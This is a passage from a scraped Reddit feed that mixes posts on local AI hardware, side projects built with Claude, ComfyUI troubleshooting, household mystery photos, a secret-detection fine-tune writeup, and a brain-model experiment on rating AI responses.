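# Fake non-deterministic agent: produces one malformed output per 10 calls.
outcomes = itertools.cycle(['{"summary": "ok"}'] * 9 + ["garbage"])
agent = lambda prompt: next(outcomes)
```

The shift from "output == expected" to "pass rate >= threshold" is essentially the difference between a unit test and an eval; regression testing then becomes tracking that rate over model or prompt changes.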

Would love to hear how people are handling this in real systems.

Thanks!

r/LocalLLaMA Scorpio_07

Waiting for M5 Pro Mac Mini — anyone actually running AI workloads on Apple Silicon? Not just LLMs

So we're a small team building on-prem AI stuff — agentic workflows, local LLM serving, RAG, audio models (ASR, TTS, stem separation, forced aligners). Proprietary data so everything has to stay local, no cloud.

Right now we're sharing an RTX 5070 Ti 16GB over LAN and it's already hitting its limits. VRAM is the bottleneck. So unified memory is the obvious next step and I'm looking at the M5 Pro Mac Mini 48GB when it drops.

I already know the CPU single/multi-core gains and GPU scores from benchmarks. That's not what I'm after. What I actually want to know is — how does it perform for real AI workloads? Specifically:

- MLX inference speed on small models (like Qwen 3.5 or Gemma 4) — especially for agentic stuff where you're doing a lot of short rapid calls, not long generation

- PyTorch with MPS — is it actually usable or still painful? Most of our stack is PyTorch and we don't know Metal/MLX well at all

- Non-LLM models — audio models, ASR, TTS, aligners, image generation, upscaling models. Does Metal acceleration actually kick in, or do these mostly fall back to CPU?

- Prompt processing throughput specifically — not just tokens/sec on long outputs

We are kinda new to the local LLM field, so we may need to cater to concurrent users. We haven't tried this with the RTX 5070 Ti; so far we've mainly tested llama.cpp via LM Studio.

Also curious if anyone's using Apple Silicon for broader org automation — accounts, CRM/CMS automation, document retrieval, internal RAG stuff. I want to explore what's actually possible beyond just LLM serving. We're a small org trying to figure out where AI can save real time across different departments.

Is the M5 Pro 48GB worth waiting for over buying M4 Pro 48GB now? Or is the jump not meaningful enough for GPU/ML workloads even if the CPU scores look good?

Following AZisk on YouTube — anyone know other people doing proper hardware evaluations for AI specifically, not just general Mac benchmarks?

Appreciate anyone sharing actual experience, and thoughts on this.

Benchmarks would be great.

r/whatisit Sage2194

What is this in my cupboard?

My wife noticed these strange deposits in a cupboard. I assume it's salt related, but can't figure out how it could have crystallised on the side of the pink/purple cardboard box. There haven't been any salt or water spills in there either. What is it?!

r/StableDiffusion namitynamenamey

Relative size comparisons based on an object?

Is there any local model that can follow a prompt with relative sizes? I tried making a silly test with zimage, chroma, anima and SDXL, and none of them was capable of following this prompt:

"There are two hamburgers in a table. The first hamburger is the size of a watermelon. The second hamburger is twice the size of the first one.

The first hamburger is to the left of the second hamburger."

They all made the hamburger out of watermelon instead. This is interesting to me, as it is a minimal example of the limitations of current models: something even a 5-year-old would be able to draw.

Image made by chroma. Notice the similar size of the "hamburgers".

Image by zimage base. Interesting idea for a dish, but also a failure to follow the prompt.

The curious thing is that relative size comparisons work... with cubes on a table. So anyway, I thought it was an interesting thing to discuss.

r/singularity enilea

Gemini ad from December 2023 showcasing a capability that ended up not being real. When will we get multimodal LLMs that can actually process video in real time as accurately?

r/me_irl yeunofficial_25

Me_irl

r/SideProject ankush2324235

Side project: I just dodged ngrok's paid plan with SSH over HTTPS

I just dodged ngrok's paid plan by building my own tool that lets you run SSH on top of HTTPS.

So here's the idea: ngrok gives you a public HTTPS URL that forwards traffic to your localhost, basically a free way to expose your local project to the internet. ngrok also used to provide a TCP URL, which I relied on to remotely access my local machine (for SSH access). But they moved that feature to a paid plan, leaving only HTTPS free. So I built my own workaround: a tool that tunnels SSH over HTTPS, letting me remotely access my machine using just the free HTTPS endpoint.

You can check it out here: https://github.com/ankushT369/GhostSSH

r/homeassistant Such_Ad_3096

Kasa KC400 Camera

Anyone sort out a way to add a live view to HAOS using the Kasa KC400 cameras? Claude and google searches have not yielded a result that works.

r/singularity thenewrepublic

Bernie Sanders’s New, Necessary, Bold Act: Taking on the AI Oligarchs

“The question that we have to ask is, ‘How do we use AI to improve life for all people?’” he said. “And just blindly following the lead of Mr. Musk and Mr. Bezos is not the way to do it. We need to have that kind of discussion. There’s a new technology, a new world that’s coming. Let’s make sure it benefits all of us, and not just a handful of billionaires.”

r/SideProject LeadershipOld1857

I grew up in my family's car dealership. Last month I built a daily car auction guessing game with AI tools. 40 strangers are already playing it.

Cars have been my whole life. Grew up in my dad's dealership, learned to read the market before I could legally drive. Eventually went out on my own, I now run a used car business.

A few months ago I kept browsing exotic car auctions online and realized something embarrassing: I genuinely didn't know if I'd nail the price on half of them. I've spent my entire career in the car business and a clean Lamborghini with an unknown history was stumping me.

So I built a game to find out.

It's called BERNIE (named after Bernie Ecclestone). Every day, 10 real exotic cars from real auctions. You guess the final sale price. Scored by how close you get.

I'm not a developer. I built the whole thing using Claude Code: scraper, backend, frontend, everything.

Shared it in a couple of Reddit comments, not expecting much. 40 people I've never met played it this week.

That felt like something worth sharing here.

Happy to talk about the build, the car market, or how badly I personally score on my own game. → https://bernie-web.vercel.app/

What was the last thing you built just because you wanted to use it yourself?

r/mildlyinteresting LordGAD

My prescription has a refill of more than zero but less than one.

r/n8n Quiet-Programmer-131

Error in n8n

"errorMessage": "Text to classify for item 0 is not defined",

r/SideProject SaiVaibhav06

looking at the roster for an upcoming ai hackathon and it gave me an existential crisis about my stack

been banging my head against the wall trying to fix some nasty auth routing bug in my mvp for like two weeks. to procrastinate i went down a rabbit hole scrolling through the profiles for this 48h ai hackathon happening in shanghai next weekend, which made me realize how totally one dimensional my 'just write clean code' mindset actually is.

The strongest profiles don't look like the old stereotype of backend devs grinding in the dark. They are weirdly hybrid. For example, I went down a rabbit hole on one profile, a girl who apparently came out of some hardcore NLP lab at Tsinghua/PKU. But instead of just publishing papers, she literally delayed her grad program to build hardware startups.

Here is the part that gave me an existential crisis: she isn't just writing the LLM fine-tuning logic. I checked her links, and she’s out here designing computational art for Nature journal covers. So you have someone wiring up physical robotic arms and integrating local models, but executing it with the aesthetic taste of a high-end design studio. She isn't just making the infra work; she's making raw, complex AI hardware actually legible and beautiful to normal people.

that mix feels super important rn. im starting to think the real edge in solo building isnt coming from raw technical ability anymore. its definitely coming from combinations that used to be rare in one person. tech instinct plus product taste.

Their feedback loop is completely different too. they dont stealth build in a vacuum for 6 months. they just drop raw working hardware prototype videos directly onto consumer apps like rednote, get absolutely roasted by regular non-tech users in the comments on the usability, and iterate the physical or software design the exact same day. high speed, zero embarrassment, high taste.

idk just something ive been noticing. with ai writing half our boilerplate anyway it feels like the bar for shipping a side project is shifting from 'can you code it' to 'do you have the taste to make it actually usable'.

Mostly it just gave me massive imposter syndrome lol. going back to crying over my docker config now.

r/ollama CharlExMachina

Never ask Gemma 4 what are the lyrics of "Still Alive"

Just installed Gemma 4 via Ollama, I asked it the lyrics of "Still Alive", it proceeded to confuse itself to oblivion

r/SideProject kova98k

I built a free tool that helps you do market research on Reddit

I built feedgrep.com

It lets you describe what you're looking for on Reddit and emails you whenever it shows up.

Recently I've added the ability to do a historical search to test the keywords.

It's free and open source.

r/artificial Mstep85

Last Call: Perplexity, Replit, & GitHub— The AI Student Discounts You're Cheerfully Paying the Tourist Price For

If you got a student edu email, these official promos will expire soon.

r/whatisit jaggy2002

Help me ID these hairy balls I found under my tree (not creepy crawly)

I was pushing back the leaves around my avocado tree when I found these little white hairy orbs. At first I thought it was the avocado sending up roots, but I shifted one with a leaf, and it moved a little too easily to be a root. I checked other spots closer and farther from the tree to see if there were more orbs, but found none.

I checked Inaturalist but it didn’t come up with any convincing matches. Closest ID was a fishbone fern, which I have nearby, but I’ve never seen their bulbs look like this before. Any ideas reddit? Or a recommendation on a better sub to ask?

(I am not touching them)

r/homeassistant Zealousideal-Try7669

Home Assistant integration for Bpt CAME Domotic (Home Sapiens / ETI-Domo)

Hi all,

I’ve developed an independent custom integration for Home Assistant to interface with Bpt home automation / CAME Domotic 3.0 (ETI-Domo systems) via the Home Sapiens web interface.

The project is stable and currently supports:

  • Activations
  • Analogic inputs
  • Climate control
  • Digital inputs
  • Energy meters
  • Fan coils
  • Intrusion alarm panel
  • Lights
  • Openings
  • Scenes
  • TVCC

It works by interacting with the same web interface used by the system, allowing full monitoring and control directly from Home Assistant.

This is an independent project and still evolving. I’d really appreciate feedback or testing from anyone using this system.

GitHub: https://github.com/odoricof/Home-Sapiens-Assistant

r/whatisit ShorelineWA_InfoHunt

Black sludge on my concrete step under my deck

I'm both baffled and disgusted. What could this be?

Best guess is either a giant poop from a wild animal or a disintegrating mushroom that grew up under the green cloth (which is an old fabric/green faux lawn thingy).

There is also a bunch of worms/maggots in it.

This is in a suburb of Seattle.

Any ideas?

r/comfyui Disastrous-Ad670

Best workflow/stack for consistent anime-style AI comics in ComfyUI?

I’m trying to create an AI-generated comic with a semi-anime style, but with a higher level of detail and consistency than typical outputs.

My main goal is character consistency across panels, so my current workflow looks like this:

  • First, I generated a set of reference faces
  • Then I trained a LoRA specifically on the character’s face
  • After that, I trained additional LoRAs for clothing and overall appearance
  • Finally, I reuse these LoRAs when generating new images for different scenes

I’ve also experimented with IPAdapter, but in my case it didn’t handle the anime style very well — though that might be due to the model or my setup.

What I’m trying to achieve:

  • Consistent characters across multiple images/panels
  • Flexible posing and composition
  • Stylized (anime-inspired), but still detailed visuals

My questions:

  1. Has anyone here successfully built a similar pipeline for AI comics?
  2. What tools/workflows are you using in ComfyUI for character consistency?
  3. Are there better alternatives to LoRA + IPAdapter for this use case (e.g. ControlNet, reference-only pipelines, fine-tuning methods, etc.)?
  4. Can you recommend a solid “stack” (models + nodes + techniques) for this kind of project?

Any tips, example workflows, or even node graphs would be greatly appreciated!

r/ClaudeAI Independent_Face210

I built 9 free Claude Code skills for medical research — from lit search to manuscript revision

I'm a radiology researcher and I've been using Claude Code daily for about a year now. Over time I built a set of skills that cover most of the research workflow — from searching PubMed to preparing manuscripts for submission. I open-sourced them last week and wanted to share.

What's included (9 skills):

  • search-lit — Searches PubMed, Semantic Scholar, and bioRxiv. Every citation is verified against the actual API before being included (no hallucinated references).
  • check-reporting — Audits your manuscript against reporting guidelines (STROBE, STARD, TRIPOD+AI, PRISMA, ARRIVE, and more). Gives you item-by-item PRESENT/PARTIAL/MISSING status.
  • analyze-stats — Generates reproducible Python/R code for diagnostic accuracy, inter-rater agreement, survival analysis, meta-analysis, and demographics tables.
  • make-figures — Publication-ready figures at 300 DPI: ROC curves, forest plots, flow diagrams (PRISMA/CONSORT/STARD), Bland-Altman plots, confusion matrices.
  • design-study — Reviews your study design for data leakage, cohort logic issues, and reporting guideline fit before you start writing.
  • write-paper — Full IMRAD manuscript pipeline (8 phases from outline to submission-ready draft).
  • present-paper — Analyzes a paper, finds supporting references, and drafts speaker scripts for journal clubs or grand rounds.
  • grant-builder — Structures grant proposals with significance, innovation, approach, and milestones.
  • publish-skill — Meta-skill that helps you package your own Claude Code skills for open-source distribution (PII audit, license check).

Key design decisions:

  1. Anti-hallucination citations: search-lit never generates references from memory. Every DOI/PMID is verified via API.
  2. Real checklists bundled — STROBE, STARD, TRIPOD+AI, PRISMA, and ARRIVE checklists are included (open-license ones). For copyrighted guidelines like CONSORT, the skill uses its knowledge but tells you to download the official checklist.
  3. Skills call each other: check-reporting can invoke make-figures to generate a missing flow diagram, or analyze-stats to fill in statistical gaps.
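As a rough illustration of the anti-hallucination idea (generic, not the actual skill code): keep only citations whose identifier passes a verifier. The verifier below is a stand-in offline DOI syntax check; the real skill would resolve each DOI/PMID against an API such as Crossref or PubMed before trusting it.

```python
import re

# Stand-in verifier: checks DOI *syntax* only. A real pipeline replaces this
# with an API lookup (e.g. resolving the DOI) before a citation is kept.
DOI_PATTERN = re.compile(r"^10\.\d{4,9}/\S+$")

def looks_like_doi(doi: str) -> bool:
    return bool(DOI_PATTERN.match(doi))

def filter_citations(citations, verify=looks_like_doi):
    """Drop any citation whose DOI fails verification instead of keeping it on faith."""
    return [c for c in citations if verify(c.get("doi", ""))]

refs = [
    {"title": "Real paper", "doi": "10.1000/xyz123"},
    {"title": "Hallucinated paper", "doi": "not-a-doi"},
]
kept = filter_citations(refs)
```

The key design point is the default-deny posture: a citation that cannot be verified is removed, rather than included with a warning.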

Install:

git clone https://github.com/aperivue/medical-research-skills.git
cp -r medical-research-skills/skills/* ~/.claude/skills/

Restart Claude Code and you're good to go. Works with CLI, desktop app, and IDE extensions.

GitHub: https://github.com/aperivue/medical-research-skills

Happy to answer questions about the implementation or take feature requests. If you work in a different research domain, the same skill architecture could be adapted — publish-skill was built specifically for that.

r/LocalLLaMA manoman42

I open-sourced a tool that compiles raw documents into an AI-navigable wiki with persistent memory; runs 100% locally

After seeing Karpathy's tweet about using LLMs to build personal wikis from research documents, I realized I'd already been using something similar internally for our R&D.

So I cleaned it up and open-sourced it.

What it does: You drop a folder of raw documents (PDFs, papers, notes, code, 60+ formats) and the LLM compiles them into a structured markdown wiki with backlinked articles, concept pages, and a master index. It then compresses everything into a .aura archive optimized for RAG retrieval (~97% smaller than raw source data).

How it works:

pip install aura-research
research init my-project
# copy docs into raw/
research ingest raw/
research compile
research query "your question"

Key design decisions:

  • No embeddings, no vector databases. Uses SimHash + Bloom Filters instead. Zero RAM overhead.
  • Built-in 3-tier Memory OS (facts / episodic / scratch pad) so the LLM doesn't forget important context across sessions
  • The wiki is just .md files, browse in Obsidian, VS Code, or whatever you like
  • Works with any LLM provider (OpenAI, Anthropic, Gemini) or as an agent-native tool inside Claude Code/Gemini CLI where no API key is needed
  • Everything runs locally. No data leaves your machine.

The "no embeddings" choice: I deliberately avoided the standard RAG pipeline (chunk → embed → vector search). Instead, the LLM compiles the knowledge into a well-structured wiki with an index. When you query, it reads the index, finds the 2-3 relevant articles, and only loads those. The LLM is smart enough to navigate a good file structure, you don't need a separate embedding model if the knowledge is properly organized.
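For readers unfamiliar with SimHash: it hashes each token and, for each bit position, sums +1/-1 votes across tokens, so near-identical documents land on nearly identical fingerprints. Duplicates can then be detected by Hamming distance with no embedding model or vector index. A generic sketch of the technique (not aura-research's actual code):

```python
import hashlib

def simhash(text: str, bits: int = 64) -> int:
    """64-bit SimHash fingerprint built from per-bit votes over token hashes."""
    votes = [0] * bits
    for token in text.lower().split():
        h = int(hashlib.md5(token.encode()).hexdigest(), 16)
        for i in range(bits):
            votes[i] += 1 if (h >> i) & 1 else -1
    fingerprint = 0
    for i, v in enumerate(votes):
        if v > 0:
            fingerprint |= 1 << i
    return fingerprint

def hamming(a: int, b: int) -> int:
    """Number of differing bits between two fingerprints."""
    return bin(a ^ b).count("1")

a = simhash("the quick brown fox jumps over the lazy dog")
b = simhash("the quick brown fox jumped over the lazy dog")  # near-duplicate
c = simhash("completely unrelated text about vector databases")
```

Unlike a cryptographic hash, changing one token only nudges a few vote sums, so `a` and `b` end up much closer in Hamming distance than `a` and `c`; that locality is what makes it useful for deduplication without embeddings.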

GitHub: https://github.com/Rtalabs-ai/aura-research PyPI: pip install aura-research

Would love feedback from this community, especially on the "structured wiki vs vector embeddings" tradeoff. Looking forward to your thoughts!

Also thinking about packaging this into a product, any insights would be appreciated!

r/LocalLLaMA chicken_5000s

Cost savings in AI (Lumin)

Just finished Lumin: https://github.com/ryancloto-dot/Lumin

It’s a local AI cost-saving proxy for agent setups. It compresses, caches, and routes requests.

Average savings on my free benchmark so far: ~11%

Best case so far on repeated-context loops: 57%

Looking for feedback from people who try it

r/meme UsuallyComplicit

But it was fully charged...

r/SideProject phone_radio_tv

ESPN like live sports studio in your pocket

When we watch live sports on TV/Netflix, the match is augmented with commentary, scoreboards, player stats, GFX & ads in real time.

I've created an app that allows individuals, schools and academies to livestream similar real-time augmentation from mobile.

How ?

  • Studio in your pocket - Mix music, QR, clips, overlays, Ads, banners, text and stunning VFX/GFX in real time - all from your mobile.
  • Multicam - Supports a network of mobile cameras. Choose the best angle for layering.
  • Multicast - Stream enhanced show instantly to one or more channels in YouTube, Instagram, X (Twitter) and Facebook.
  • DJ Style - Manage scenes & PiP of livestream using swipe and touch.

Download CheerArena Studio from Playstore

r/whatisit 20on_pump3

Carbon monoxide detector? Not sure.

Attached to the wall in my Airbnb, about maybe 10’ up. There’s no visible lights or anything.

r/ClaudeAI lowcoordination

I built an MCP server with Claude Code to automate my Minnesota land search — here's what AI-assisted development actually looks like

Background: InfoSec / automation engineering. Been using AI seriously for about two months when I started this. Not a vibe coder — I wanted to understand what I was building.

The problem: finding 40+ acres of rural Minnesota land under $150K, against 10 hard criteria (flood zone, hospital proximity, mining distance, fiber, buildability, etc.) across 21 counties without missing anything.

What I built with Claude Code:

- Python / FastMCP server with 7 tools

- SQLite for persistence + deduplication

- Zillow + LandWatch scraping via httpx + BeautifulSoup

- n8n workflow for scheduled daily runs

- Dockerized, connects to Claude or any MCP-compatible client

Claude Code wrote most of the Python. I steered, pushed back, caught bad output, and made the architecture calls. The thing I keep coming back to: an MCP server isn't static code — it gets smarter as the model using it gets smarter. I stumbled into that decision but it turned out to be the right call.

First run: 49 raw listings → 29 unique filtered parcels. Including a $44,900 / 40-acre listing in Crow Wing County that I still need to figure out what's wrong with.
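The persistence + deduplication piece is the kind of thing SQLite handles in a few lines. A generic sketch with a hypothetical schema (not the repo's actual code): a PRIMARY KEY on the listing URL makes repeated daily runs idempotent, since re-scraped listings are silently ignored.

```python
import sqlite3

conn = sqlite3.connect(":memory:")  # a real tool would use a file on disk

conn.execute("""
    CREATE TABLE IF NOT EXISTS listings (
        url     TEXT PRIMARY KEY,   -- dedup key: same listing never stored twice
        acres   REAL,
        price   INTEGER,
        county  TEXT
    )
""")

def upsert(listing: dict) -> bool:
    """Insert a scraped listing; return True only if it was new."""
    cur = conn.execute(
        "INSERT OR IGNORE INTO listings (url, acres, price, county) VALUES (?, ?, ?, ?)",
        (listing["url"], listing["acres"], listing["price"], listing["county"]),
    )
    conn.commit()
    return cur.rowcount == 1  # 0 when the PRIMARY KEY already existed

raw = [
    {"url": "https://example.com/a", "acres": 40, "price": 44900, "county": "Crow Wing"},
    {"url": "https://example.com/b", "acres": 80, "price": 120000, "county": "Pine"},
    {"url": "https://example.com/a", "acres": 40, "price": 44900, "county": "Crow Wing"},  # repeat
]
new_count = sum(upsert(listing) for listing in raw)
```

Filtering 49 raw listings down to unique parcels is then just a matter of counting the rows that survive the `INSERT OR IGNORE`.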

Full write-up: https://biuiw.hashnode.dev/from-zero-to-mcp-server-how-i-automated-my-minnesota-land-search

Open source: https://github.com/lowcoordination/mcp-mn-land

r/Jokes Main_Newt3686

I survived a fall without a parachute...

I've also survived a winter, spring and summer without one, too.

r/comfyui Senpai404

Problem with AMD Windows portable edition

Hello everyone,
I wanted to try ComfyUI, so I downloaded the latest AMD-specific package. After extracting it, I ran the file “run_amd_gpu.bat” but I get this error:

E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable>.\python_embeded\python.exe -s ComfyUI\main.py --windows-standalone-build

comfy-aimdo failed to load: Could not find module 'E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_aimdo\aimdo.dll' (or one of its dependencies). Try using the full path with constructor syntax.

NOTE: comfy-aimdo is currently only support for Nvidia GPUs

Fatal error in launcher: Unable to create process using '"D:\a\ComfyUI\python_embeded\python.exe" "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Scripts\offload-arch.exe" ': Impossibile trovare il file specificato. ("The specified file could not be found.")

[WARNING] offload-arch failed with return code 1

[stderr]

Windows fatal exception: access violation

Stack (most recent call first):

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\torch\cuda\__init__.py", line 182 in is_available
File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_kitchen\backends\cuda\__init__.py", line 639 in _register
File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_kitchen\backends\cuda\__init__.py", line 650 in <module>
File "<frozen importlib._bootstrap>", line 488 in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 999 in exec_module
File "<frozen importlib._bootstrap>", line 935 in _load_unlocked
File "<frozen importlib._bootstrap>", line 1331 in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 1360 in _find_and_load
File "<frozen importlib._bootstrap>", line 488 in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 1415 in _handle_fromlist
File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_kitchen\__init__.py", line 3 in <module>
File "<frozen importlib._bootstrap>", line 488 in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 999 in exec_module
File "<frozen importlib._bootstrap>", line 935 in _load_unlocked
File "<frozen importlib._bootstrap>", line 1331 in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 1360 in _find_and_load
File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\comfy\quant_ops.py", line 5 in <module>
File "<frozen importlib._bootstrap>", line 488 in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 999 in exec_module
File "<frozen importlib._bootstrap>", line 935 in _load_unlocked
File "<frozen importlib._bootstrap>", line 1331 in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 1360 in _find_and_load
File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\comfy\memory_management.py", line 8 in <module>
File "<frozen importlib._bootstrap>", line 488 in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 999 in exec_module
File "<frozen importlib._bootstrap>", line 935 in _load_unlocked
File "<frozen importlib._bootstrap>", line 1331 in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 1360 in _find_and_load
File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\comfy\utils.py", line 25 in <module>
File "<frozen importlib._bootstrap>", line 488 in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 999 in exec_module
File "<frozen importlib._bootstrap>", line 935 in _load_unlocked
File "<frozen importlib._bootstrap>", line 1331 in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 1360 in _find_and_load
File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\main.py", line 194 in <module>

E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable>pause

Premere un tasto per continuare . . . ("Press any key to continue . . .")

It seems to me that the issue is “comfy_kitchen,” which tries to load CUDA, but since I have an AMD GPU it fails. Why is this component included in the AMD GPU version? How can I fix this?

r/LocalLLaMA Oatilis

A technical, 100% local writeup on how I replicated and then surpassed the Secret Detection model from Wiz (and the challenges along the way) - including labeling an entire dataset with local AI

Hey everybody, I have a strong interest in offloading work to small, specialized models that I can parallelize - this lets me scale work significantly (plus, I am less dependent on proprietary APIs)

Some time ago, I saw a blog post from Wiz about fine-tuning Llama 3.2-1B for secret detection in code. They got 86% Precision and 82% Recall. I wanted to see if I can replicate (or beat) those numbers using purely local AI and produce a local specialized model.

After a couple of weekends of trying it out I managed to get a Llama 3.2-1B hitting 88% Precision and 84.4% Recall simultaneously!

I also benchmarked Qwen 3.5-2B and 4B - expectedly, they outperformed Llama 1B at the cost of more VRAM and longer inference time.

I’ve put together a full write-up with the training stats, examples, and a step-by-step breakdown of what I went through to hit these metrics. Warning: It's technical and pretty long, but I honestly think it's fun to read.

Here are some highlights:

  • I only sourced publicly available data. This wasn't enough so I used procedural generation to augment and improve my dataset. Labeling was done locally using Qwen3-Coder-Next (sorry Claude, you sit this one out).
  • Instead of just finding secrets, I trained the models to output structured JSON. Initially, every vanilla SLM I tested (Llama & Qwen) scored 0% on schema compliance, but I got them to 98-100% after training.
  • I made a somewhat embarrassing mistake by including a high-entropy class, which was detrimental to training, but I caught it and removed it eventually.
  • I discovered 4,500 of my "negative" samples actually contained real-world passwords (even though they don't seem real!). The model was literally being trained to ignore secrets. At this point I was already clearing the metrics set by Wiz, but fixing this improved the recall on passwords.
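For anyone comparing numbers like these: precision and recall come straight from the confusion counts. A quick stdlib sketch of how such metrics are computed from labeled predictions (generic, not the writeup's evaluation code):

```python
def precision_recall(y_true, y_pred):
    """Precision = TP/(TP+FP), Recall = TP/(TP+FN) for binary labels (1 = secret)."""
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall

# Toy eval set: 4 real secrets, 6 benign strings.
y_true = [1, 1, 1, 1, 0, 0, 0, 0, 0, 0]
y_pred = [1, 1, 1, 0, 1, 0, 0, 0, 0, 0]  # one missed secret, one false alarm
p, r = precision_recall(y_true, y_pred)
```

This also shows why the mislabeled "negative" samples mattered so much: every real password labeled 0 in the training data teaches the model to produce false negatives, which directly suppresses recall.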

Would love to hear if anyone else is pursuing efficient 1B/3B finetunes for specialized tasks and about your stack!

AI Disclaimer: I write everything myself - this post, and the full writeup. Please point out any typos!

r/StableDiffusion Complete-Box-3030

Any fast workflow for ltx 2.3 ,image 2 video

r/whatisit Direct-Web3712

Weird sound coming from my vent. Sounds like a bird and or a mouse squeaking along with creaking.

please let me know what this is. its been off and on for an hour! I dont have an infestation so Im thinking it has something to do with my upstairs neighbors. thanks guys!

r/ProgrammerHumor gfcf14

style

r/ClaudeAI KevinRaynor90

How to best curate a historical data set generated by Claude

I've been building an online map tool for learning history in a visual way (showing connections where relevant, and placing events in geographic context). I think it could be a great way to get more people, including myself, into history, especially if they're more visual learners. It's online at: https://visualworldhistory.com/

One thing I'm struggling with, however, is that I've used Claude to generate the content. I'm trying hard to ensure it's accurate, but I'm not 100% sure whether this is the right approach. Anything I might add to help ensure accuracy?

My current steps:

  1. Run Opus and generate a master list of global events (with lat/lon and importance) and have it verify this afterwards.
  2. Then use the masterlist to generate detail data that contains summaries following a certain template, where it cross-checks whether any of these have related events.
  3. Then I set up a history curator agent that runs Opus at heavier effort to go over all detail events and check for historical inaccuracies. This seems to do a good job, but it also uses a lot of tokens, so I'd ideally like to re-run it several times; it's hard to reason about whether that's worth doing.

Anything I might be missing in the process? Or a way to more accurately curate these events that doesn't just involve a parallel curator set up?

r/whatisit SunPossible6793

Connecticut added a ton of highway cameras. What’s this box attached to the poles?

r/ClaudeCode llIIIIIIIIIIIIIIIIlI

“I said hi [nb: in the middle of peak usage hours, loaded 200 skills, 25k line MCPs and sacrificed a mutant crocodile in the process], now my weekly limit is gone”

YES THEY’RE BEING ODD ABOUT THE LIMITS BUT FELLAS COME ON

r/mildlyinteresting ehedfdgfdfg

This sign says "Gurple" instead of purple

r/todayilearned BusinessAlive3486

TIL in some countries people race each other on the back of ostriches. They are ridden in the same way as horses with special saddles, reins, and bits. However, they are harder to manage than horses. The practice is common in Africa.

r/AI_Agents Secure_Bit_2321

Wanting to get into AI agent dev but completely lost - where do you even start in 2026?

Problem is I have zero clue where to start. Every time I Google it I get 10 different answers - some say start with n8n, some say LangGraph, some say just use raw API calls, some say CrewAI, AutoGen... it's overwhelming.

A few honest questions:

- Should I start with a no-code/low-code tool like n8n to understand the concepts, then move to code-first frameworks?

- Or is n8n just a detour and I should go straight to LangGraph / LlamaIndex?

- Is LangGraph overkill for a beginner or is it the right place to invest time?

- What's the actual skill progression that made you good at this?

I don't mind putting in the work - I just don't want to spend 3 months on the wrong thing. If you've gone from zero to building real agentic systems, I'd love to hear your actual path.

Thanks in advance 🙏

r/n8n Significant-Bid-8482

How do I properly import workflows into a new n8n instance?

I’m migrating to a new n8n instance and want to move my existing workflows.

What’s the best way to do this?
– Export/import JSON manually?
– Copy database?
– Any gotchas with credentials or environment variables?

I tried importing via JSON but ran into issues with credentials not linking correctly.

Any recommended approach?
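For what it's worth, n8n ships CLI commands for exactly this kind of migration; a sketch (flags can differ by version, so check the docs for yours):

```shell
# On the old instance: export workflows and credentials
n8n export:workflow --all --output=workflows.json
n8n export:credentials --all --decrypted --output=credentials.json

# On the new instance: import them
n8n import:workflow --input=workflows.json
n8n import:credentials --input=credentials.json
```

The classic gotcha: if you copy the database instead, credentials are stored encrypted with `N8N_ENCRYPTION_KEY`, so the new instance needs the same key or none of them will decrypt. Decrypted exports are plaintext secrets, so handle the file accordingly.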

r/LocalLLaMA Spiritual_Guide6862

I used Meta's TRIBE v2 brain model to detect AI sycophancy — 100% accuracy with zero training


TL;DR: Used Meta's TRIBE v2 (brain foundation model) to predict neural activations from AI responses, mapped them to 5 cognitive dimensions, and tested whether these could discriminate response quality. Sycophancy detection: 100% accuracy with no labels, no training.

**Motivation**

Standard RLHF compresses human judgment into a single binary bit (A > B). This loses the *reason* for preference. A response can look fluent, confident, and helpful — and still be sycophantic. Text-based reward models struggle with this because sycophantic text and honest text look similar on the surface.

Neuroscience has a different angle: the brain processes sycophancy vs honesty differently at the network level. The Ventral Attention Network activates when something seems wrong. The Default Mode Network drives deep semantic processing. These are independent axes.

**Method**

4-model pipeline:

1. LLaMA 3.2 3B → text embeddings
2. Wav2Vec-BERT → prosody features (via TTS simulation)
3. TRIBE v2 → predicted fMRI activations (20,484 fsaverage5 vertices)
4. CalibrationMLP → 5 cognitive dimension scores

Schaefer 2018 atlas maps activations to networks:

- Comprehension = Default A + B parcels
- Memory = Limbic
- Attention = Frontoparietal + Dorsal Attention
- Confusion = Ventral Attention (error detection)
- DMN Suppression = negative Default C (engagement proxy)

Tested on 30 hand-rated prompt-response pairs across 6 categories.

**Results**

| Category | Brain-as-Judge Accuracy |
|---|---|
| Sycophancy | 100% |
| Clarity | 100% |
| Depth | 80% |
| Coherence | 60% |
| Factual accuracy | 20% |
| Mixed | 60% |
| **Overall** | **70%** |

The failure on factual accuracy is expected and informative: the brain model predicts *perception*, not *ground truth*. A fluent false statement activates comprehension just as well as a fluent true one.

